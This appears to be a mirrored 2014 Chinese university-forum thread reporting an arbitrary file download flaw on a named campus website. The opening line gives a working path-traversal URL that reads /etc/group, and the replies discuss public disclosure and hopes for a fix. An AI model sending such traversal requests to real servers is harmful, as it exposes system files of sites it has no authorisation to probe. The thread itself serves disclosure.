返回信息流http://www.yzb.bupt.cn/admin_upload.php?a1=../../../../../../../../etc/group
任意文件下载,
这是一条镜像帖。来源:北邮人论坛 / security / #38440同步于 2014/9/1
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
在网上看到这个漏洞为什么不修复呢?
houlen
2014/9/1镜像同步4 回复
订阅后,新回复会通过你的通知中心匿名送达。
4 条回复
【 在 zhulan1991 的大作中提到: 】
: 北邮网站其他漏洞也不少,不知道该找谁负责……
: 另外这样公开给出细节?……
不是我公开的,是在乌云网上公开的啊。。我只是转过来,希望修复吧。
额,没有注意……乌云上的我们学校好像一般都会忽略了……
相信学校会修复的……
【 在 houlen 的大作中提到: 】
:
: 不是我公开的,是在乌云网上公开的啊。。我只是转过来,希望修复吧。